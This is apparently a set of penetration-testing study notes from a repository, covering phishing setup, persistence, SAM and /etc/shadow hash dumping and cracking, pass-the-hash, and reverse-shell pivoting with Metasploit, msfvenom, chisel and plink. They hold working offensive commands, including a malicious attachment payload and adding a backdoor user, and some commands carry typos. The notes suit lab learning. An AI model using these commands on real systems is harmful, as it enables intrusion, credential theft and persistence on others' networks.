`https://onlinebank.thm` 38 | 39 | ## Phishing Infrastructure 40 | 41 | #### Domain Name 42 | 43 | You'll need to register either an authentic-looking domain name or one that mimics the identity of another domain. See task 5 for details on how to create the perfect domain name. 44 | 45 | #### SSL/TLS Certificates 46 | 47 | Creating SSL/TLS certificates for your chosen domain name will add an extra layer of authenticity to the attack. 48 | 49 | #### Email Server/Account 50 | 51 | You'll need to either set up an email server or register with an SMTP email provider. 52 | 53 | #### DNS Records 54 | 55 | Setting up DNS Records such as SPF, DKIM, DMARC will improve the deliverability of your emails and make sure they're getting into the inbox rather than the spam folder. 56 | 57 | #### Web Server 58 | 59 | You'll need to set up webservers or purchase web hosting from a company to host your phishing websites. Adding SSL/TLS to the websites will give them an extra layer of authenticity. 60 | 61 | #### Analytics 62 | 63 | When a phishing campaign is part of a red team engagement, keeping analytics information is more important. You'll need something to keep track of the emails that have been sent, opened or clicked. You'll also need to combine it with information from your phishing websites for which users have supplied personal information or downloaded software. 64 | 65 | #### Automation and Useful Software 66 | 67 | Some of the above infrastructures can be quickly automated by using the below tools. 68 | 69 | #### GoPhish (Open-Source Phishing Framework 70 | 71 | [GoPhish ](https://getgophish.com/)is a web-based framework to make setting up phishing campaigns more straightforward. GoPhish allows you to store your SMTP server settings for sending emails, has a web-based tool for creating email templates using a simple WYSIWYG (What You See Is What You Get) editor. You can also schedule when emails are sent and have an analytics dashboard that shows how many emails have been sent, opened or clicked. 72 | 73 | #### SET (Social Engineering Tookit) 74 | 75 | The [Social Engineering Toolkit](https://www.trustedsec.com/tools/the-social-engineer-toolkit-set/) contains a multitude of tools, but some of the important ones for phishing are the ability to create spear-phishing attacks and deploy fake versions of common websites to trick victims into entering their credentials. 76 | 77 | ## Using GoPhish 78 | 79 | ## Droppers 80 | 81 | Droppers are software that phishing victims tend to be tricked into downloading and running on their system. The dropper may advertise itself as something useful or legitimate such as a codec to view a certain video or software to open a specific file. 82 | 83 | The droppers are not usually malicious themselves, so they tend to pass antivirus checks. Once installed, the intended malware is either unpacked or downloaded from a server and installed onto the victim's computer. The malicious software usually connects back to the attacker's infrastructure. The attacker can take control of the victim's computer, which can further explore and exploit the local network. 84 | 85 | ## Choosing A Phishing Domain 86 | 87 | ## Using MS Office in Phishing 88 | 89 | ## Using Browser Exploits 90 | 91 | ## Phishing Practical 92 | -------------------------------------------------------------------------------- /post-exploitation/cleanup.md: -------------------------------------------------------------------------------- 1 | # Cleanup 2 | 3 | ## Cleanup Overview 4 | 5 | * Make the system/network as it was when you entered it 6 | * Remove executables, scripts, and added files 7 | * Remove malware, rootkits, and added user accounts 8 | * Set settings back to original configurations 9 | -------------------------------------------------------------------------------- /post-exploitation/maintaining-access.md: -------------------------------------------------------------------------------- 1 | # Maintaining Access 2 | 3 | ## Maintaining Access Overview 4 | 5 | ### Persistence Scripts 6 | 7 | * Run `persistence -h` 8 | * `exploit/windows/local/persistence` 9 | * `exploit/windows/local/registry_persistence` 10 | 11 | ### Scheduled Tasks 12 | 13 | * Run `scheduleme` 14 | * Run `schtaskabuse` 15 | 16 | ### Add a User 17 | 18 | * `net user hacker password123 /add` 19 | -------------------------------------------------------------------------------- /post-exploitation/passwords.md: -------------------------------------------------------------------------------- 1 | # Passwords 2 | 3 | ## Obtaining Windows Passwords 4 | 5 | Windows credentials may come from an Active Directory account or stored locally. Passwords are stored in two ways: The LAN Manager password hash and the NT password hash. They are often seen together separated by a colon and known as an NTLM hash pair. Neither are salted. LM hashes are limited to 14 characters. 6 | 7 | ### Finding Hashes 8 | 9 | ```bash 10 | net user # List user accounts 11 | net user # Get more details of a specific user 12 | ``` 13 | 14 | Credentials are stored in the SAM database and we need to be an Administrator to see it. 15 | 16 | ```bash 17 | # SAM file can be located in: 18 | dir \windows\system32\config # But not accessible while OS is running 19 | # Values are also stored in the registry at: 20 | HKEY_LOCAL_MACHINE\SAM 21 | ``` 22 | 23 | The SAM file is locked when the operating system is active. We will need to take a backup of the SAM file instead while the machine is active as well as the security file and the system file. 24 | 25 | ```bash 26 | reg save hklm\sam sam.save 27 | reg save hklm\security security.save 28 | reg save hklm\system system.save 29 | ``` 30 | 31 | After copying the files over to Kali we can extract the hashes from the SAM database. 32 | 33 | ```bash 34 | # Using samdump 35 | samdump2 system.save sam.save 36 | # Using pwdump 37 | pwdump system.save same.save 38 | # Using secrets dump from Impacket 39 | python secretsdump.py -sam sam.save -system system.save LOCAL 40 | ``` 41 | 42 | If we have a Meterpreter session we can use the `hashdump` command to try to dump the hashes. 43 | 44 | ### Cracking Hashes 45 | 46 | Now that we have a list of hashes we can place the hashes outputs into a file and then attempt to crack them using John The Ripper. 47 | 48 | ```bash 49 | john myhash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=NT-old 50 | ``` 51 | 52 | Another tool we can use to find and crack hashes is Sam Inside (GUI). 53 | 54 | ### Passing Hashes 55 | 56 | Pass-The-Hash is a different kind of authentication attack that allows us to use LM & NT hashes to gain access to a remote Windows host without having to know the actual password. 57 | 58 | Example using Metasploit: 59 | 60 | ```bash 61 | msf > use exploit/windows/smb/psexec 62 | msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp 63 | msf exploit(psexec) > set LHOST 64 | msf exploit(psexec) > set LPORT 65 | msf exploit(psexec) > set RHOST 66 | msf exploit(psexec) > set SMBUser 67 | msf exploit(psexec) > set SMBPass 68 | msf exploit(psexec) > exploit 69 | ``` 70 | 71 | ## Obtaining Linux Passwords 72 | 73 | ### Finding Hashes 74 | 75 | On a standard Linux system the user accounts are stored in the `/etc/passwd` file. There will be an 'x' where the password used to be but is now stored in the file `/etc/shadow`. 76 | 77 | ```bash 78 | cat /etc/passwd 79 | cat /etc/shadow 80 | ``` 81 | 82 | ### Cracking Hashes 83 | 84 | We can combine the two files to extract the user and password information and then attempt to crack them using John The Ripper. 85 | 86 | ```bash 87 | unsahdow passwd shadow > full.txt 88 | john full.txt --wordlist=/usr/share/wordlists/rockyou.txt 89 | ``` 90 | 91 | ## Password Cracking 92 | 93 | ### Cracking Hashes 94 | 95 | #### Crackstation 96 | 97 | [https://crackstation.net/](https://crackstation.net/) 98 | 99 | #### JohnTheRipper 100 | 101 | ```bash 102 | john linhash.txt --worlist=/usr/share/wordlists/rockyou.txt 103 | john --show linhash.txt # Show already cracked passwords for specific hashes 104 | ``` 105 | 106 | #### Hashcat 107 | 108 | ```bash 109 | hashcat -m hash.txt wordlist.txt 110 | ``` 111 | 112 | ### Cracking Files 113 | 114 | #### Zip 115 | 116 | ```bash 117 | fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt file.zip 118 | ``` 119 | 120 | #### id\_rsa 121 | 122 | ```bash 123 | ``` 124 | 125 | ### Other 126 | 127 | #### Crunch 128 | 129 | Crunch can create a wordlist based on criteria you specify. The output from crunch can be sent to the screen, file, or to another program. 130 | 131 | ```bash 132 | crunch 10 10 -t password%% # Generates list of 10 characters ending in 00-99 133 | password00 134 | ... 135 | password99 136 | 137 | crunch 6 6 -t pass@@ -o pass.txt # Generates list of 6 characters ending in aa-zz 138 | passaa 139 | ... 140 | passzz 141 | ``` 142 | 143 | #### CeWL 144 | 145 | CeWL (Custom Word List generator) is a ruby app which spiders a given URL, up to a specified depth, and returns a list of words which can then be used for password crackers such as John the Ripper. Optionally, CeWL can follow external links. 146 | 147 | CeWL can also create a list of email addresses found in mailto links. These email addresses can be used as usernames in brute force actions. 148 | 149 | ```bash 150 | cewl -w meta.txt -d 3 151 | ``` 152 | -------------------------------------------------------------------------------- /post-exploitation/tunneling-and-port-forwarding.md: -------------------------------------------------------------------------------- 1 | # Tunneling and Port Forwarding 2 | 3 | ## SSH 4 | 5 | ### Local Port Forwarding 6 | 7 | Scenario: When getting a foothold on a target machine, you find a service running on it that is only listening on the local host, so you want to forward it to the Attack machine so you can access it. 8 | 9 | ```bash 10 | # From Kali (Attack Machine) 11 | # Syntax 12 | ssh -L :: -l 13 | # Example (from the Pandora machine on HTB) 14 | ssh -L 8888:127.0.0.1:80 -l daniel 10.129.250.50 15 | ``` 16 | 17 | If we look at our local Kali host `http://127.0.0.1:8080` nothing is currently running there. 18 | 19 | Now use SSH to connect to my target server on port 80, but access it on port 8080 locally. 20 | 21 | ```bash 22 | # From Kali 23 | ssh -f -nNT -L 8080:localhost:80 target_user@target_IP 24 | ssh -f -nNT -L 8080:localhost:80 msfadmin@10.0.2.8 25 | ``` 26 | 27 | Should now be able to navigate to `http://127.0.0.1:8080` and see the target's web page. 28 | 29 | We can use `lsof` to kill it: `lsof -i` and kill the PID of the process. 30 | 31 | ### Remote Port Forwarding 32 | 33 | ```bash 34 | # From Target 35 | sudo ssh -R 2222:localhost:22 kali@kali_IP 36 | # From Kali 37 | ssh target_IP -p 2222 38 | ``` 39 | 40 | ``` 41 | Running HTTP through an SSH Tunnel 42 | # From Target 43 | sudo ssh -f -nNT -R 8080:localhost:80 msfadmin@10.0.2.8 44 | # From Kali 45 | # Can now navigate to 10.0.2.8 in a browser. Was not available prior. 46 | ``` 47 | 48 | ### Dynamic Port Forwarding 49 | 50 | ```bash 51 | # From Kali 52 | ssh -f - N -D 9050 kali@intermediate_IP # Dual homed with second IP of 10.1.1.7 53 | proxychains ssh 10.1.1.5 # Target IP 54 | ``` 55 | 56 | ## Chisel 57 | 58 | ### Socks Proxy 59 | 60 | ```bash 61 | # From Kali 62 | chisel server -p 8000 --reverse 63 | 64 | # From Target - Download necessary platform binary i.e Linux adm64, Windows, etc. 65 | ./chisel client 10.50.143.31:8000 R:socks 66 | 67 | # And now use proxychains with port 1080 (default) 68 | ``` 69 | 70 | ### Port Forwarding 71 | 72 | Scenario: When getting a foothold on a target machine, you find a service running on port 8000 that is only listening on the local host, so you want to forward it to the Attack machine (also to port 8000) so you can access it. 73 | 74 | ```bash 75 | # From kali 76 | chisel server -p 12312 --reverse 77 | 78 | # From Target 79 | ./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:8000:127.0.0.1:8000 80 | ``` 81 | 82 | ## Plink 83 | 84 | ### Example 85 | 86 | Pivoting through Windows based operating systems. 87 | 88 | Scenario: From compromising a Windows server, we discover a mysqld.exe running on port 3306. 89 | 90 | ```powershell 91 | # From a Windows System shell 92 | # Transfer Plink.exe to this Windows system 93 | plink.exe -ssh -l kali -pw kali -R : 94 | plink.exe -ssh -l kali -pw kali -R 100.11.0.4:1234:127.0.0.1:3306 10.11.0.4 95 | # From Kali 96 | sudo nmap -sV 127.0.0.1 -p 1234 97 | ``` 98 | 99 | ## sshuttle 100 | 101 | ### Example 102 | 103 | > Will only work if SSH is running and will NOT work on Windows machines 104 | 105 | ```bash 106 | # From Kali 107 | sshuttle -r USER@MACHINE_IP 0.0.0.0/0 108 | ``` 109 | 110 | ## Armitage 111 | 112 | ### Example 113 | 114 | ```bash 115 | # Setup Meterpreter revere shell 116 | msfvenom -p windows/meterpreter/reverse_tcp --platform windows --arch x86 -f exe LHOST= LPORT= -o winjan.exe 117 | # From Armitage 118 | # Add target host, select payload, windows, meterpreter, reverse_tcp, remove encoding, and update the port 119 | # Now wait for a victim to click the malicious attachment winjan.exe 120 | # Arimtage has detected and exploited it 121 | # Right click on the target to select meterpreter, pivoting, setup, and see additional hosts 122 | # We can now scan the new target(s). Select Hosts, MSFscans, and enter range 123 | ``` 124 | 125 | ## Metasploit 126 | 127 | ### Example 128 | 129 | ```bash 130 | msf > use exploit/multi/handler 131 | msf > set payload windos/meterpreter/reverse_tcp 132 | msf > set lhsot 133 | msf > set lport 134 | msf > exploit 135 | # Now execute the winjan.exe file from the target like with Armitage 136 | # We now have a meterpreter reverse shell and can check the network configuration 137 | meterpreter > shell 138 | C:\tools>ipconfig 139 | exit 140 | meterpreter > background 141 | msf exploit(multi/handler) > use post/multi/manage/autoroute 142 | msf post(multi/manage/autoroute) > set subnet 10.1.1.0 143 | msf post(multi/manage/autoroute) > set session 1 144 | msf post(multi/manage/autoroute) > exploit 145 | # We can now pivot by scanning one of the new targets 146 | msf auxiliary(scanner/ssh/ssh_version) > set rhosts 10.1.1.5 147 | msf auxiliary(scanner/ssh/ssh_version) > exploit 148 | ``` 149 | 150 | 151 | 152 | ## RINETD 153 | 154 | ### Example 155 | 156 | During an assessment, we gained root access to an Internet-connected Linux web server. From there, we found and compromised a Linux client on an internal network, gaining access to SSH credentials. 157 | 158 | ```bash 159 | # From Kali 160 | # Test network connectivity 161 | kali@kali:~$ ping google.com -c 1 162 | PING google.com (216.58.207.142) 56(84) bytes of data. 163 | 164 | # Test connection to found IP 165 | kali@kali:~$ root@kali:~# nc -nvv 216.58.207.142 80 166 | (UNKNOWN) [216.58.207.142] 80 (http) open 167 | GET / HTTP/1.0 168 | ``` 169 | 170 | ```bash 171 | # Access compromised target via SSH 172 | kali@kali:~# ssh student@10.11.0.128 173 | 174 | # Test network connectivity -- no internet access 175 | kali@kali:~$ ping google.com -c 1 176 | (UNKNOWN) [216.58.207.142] 80 (http) : No route to host 177 | ``` 178 | 179 | ```bash 180 | # Redirect traffic to our Kali linux server using RINETD 181 | 182 | ss -antp | grep "80" 183 | 184 | # From Compromised target to Kali linux 185 | student@debian:~$ nc -nvv 10.11.0.4 80 186 | (UNKNOWN) [10.11.0.4] 80 (http) open 187 | GET / HTTP/1.0 188 | ``` 189 | 190 | ## NETSH 191 | 192 | ### Example 193 | 194 | Scenario: Compromised a Windows target through remote vuln and obtain System privileges. We find an additional network interface. We identify a Windows Server that has port 445 open. 195 | 196 | ```powershell 197 | # From Windows compromised target 198 | netsh interface portproxy add v4tov4 listenport= listenaddress= connectport= 199 | netsh interface portproxy add v4tov4 listenport=4455 listenaddress=10.11.0.22 connectport=445 connectaddress=192.168.1.110 200 | # Check for listening 201 | netstat -anp TCP | find "4455" 202 | # With admin permissions we can allo forwarding rule 203 | netsh advfirewall add rule name="forward_port_rule" protocol=TCP dir=in localip=10.11.0.22 localport=4455 action allow 204 | 205 | # From Kali 206 | smbclient -L 10.11.0.22 --port=4455 --user=Administrator 207 | Data 208 | # If an error occurs, we can test interaction 209 | sudo mkdir /mnt/win10_share 210 | sudo mount -t cifs -o port=4455 //10.11.0.22/Data -o username=Administrator,password=Qwerty /mnt/win10_share 211 | ls -l /mnt/win10_share 212 | ``` 213 | -------------------------------------------------------------------------------- /scanning-and-enumeration/enumeration.md: -------------------------------------------------------------------------------- 1 | # Enumeration 2 | 3 | TCM's modified script - [https://pastebin.com/MhE6zXVt](https://pastebin.com/MhE6zXVt) 4 | 5 | ## Some Steps 6 | 7 | 1. nmap scan 8 | 2. nmap script scan (http, smb, smtp, tftp, etc.) 9 | 3. Metasploit enumeration 10 | 4. searchsploit / exploitDB (others) 11 | 5. Google 12 | 13 | ### Other Tools 14 | 15 | * Reconnoitre 16 | * Vanquish 17 | * Sn1per 18 | * SPARTA 19 | 20 | ## Ping 21 | 22 | > When pinging a machine we can confirm the OS type by the TTL. 23 | > 24 | > Windows default TTL is 128 which decreases by 1 when a packet traverses a router, so look for 127. If its between 64 and 128, chances are it's Windows. 25 | > 26 | > Linux default TTL is 64. If its below 64, chances are it's Linux. 27 | > 28 | > Anything above 128, chances are it is a network infrastructure. Cisco router is 255. 29 | -------------------------------------------------------------------------------- /scanning-and-enumeration/network-scanning.md: -------------------------------------------------------------------------------- 1 | # Network Scanning 2 | 3 | ## nmap 4 | 5 | ### Examples 6 | 7 | ```bash 8 | nmap -T4 -p- -oA nmap/tcp_all_ports # Scan all TCP ports 9 | nmap -T4 -p- -oA --open -vv nmap/tcp_all_ports_verbose # Same but be verbose and show open ports 10 | nmap -sCV -p -oA nmap/tcp_def_scripts # Default scripts with found ports 11 | nmap --script *vuln* -p -oA nmap/tcp_vlun_scripts # Vuln scripts with found ports 12 | ``` 13 | 14 | ### Basic Scans 15 | 16 | ```bash 17 | nmap # Basic scan of the top 1000 ports 18 | nmap -p- # Basic scan of all 65535 ports 19 | nmap -iL # Input from list of hosts/networks 20 | nmap -v # Increase verbosity level (use -vv or more for greater effect) 21 | ``` 22 | 23 | ### Host Discovery 24 | 25 | ```bash 26 | nmap -sn # Ping Scan - disable port scan 27 | nmap -Pn # Treat all hosts as online -- skip host discovery 28 | ``` 29 | 30 | ### Scan Techniques 31 | 32 | ```bash 33 | nmap -sS # SYN scan 34 | nmap -sU # UDP scan 35 | ``` 36 | 37 | ### Port Specification 38 | 39 | ```bash 40 | nmap -p22 # Scan a specific port 41 | nmap -p22,80,443 # Scan multiple specific ports 42 | nmap -p1-65535 # Scan a range of ports 43 | ``` 44 | 45 | ### Service/Version & OS Detection 46 | 47 | ```bash 48 | nmap -sV # Probe open ports to determine service/version info 49 | nmap -O # Enable OS detection 50 | nmap -A # Enable OS detection, version detection, script scanning, and traceroute 51 | ``` 52 | 53 | ### Script Scan 54 | 55 | ```bash 56 | nmap -sC # equivalent to --script=default 57 | nmap --script=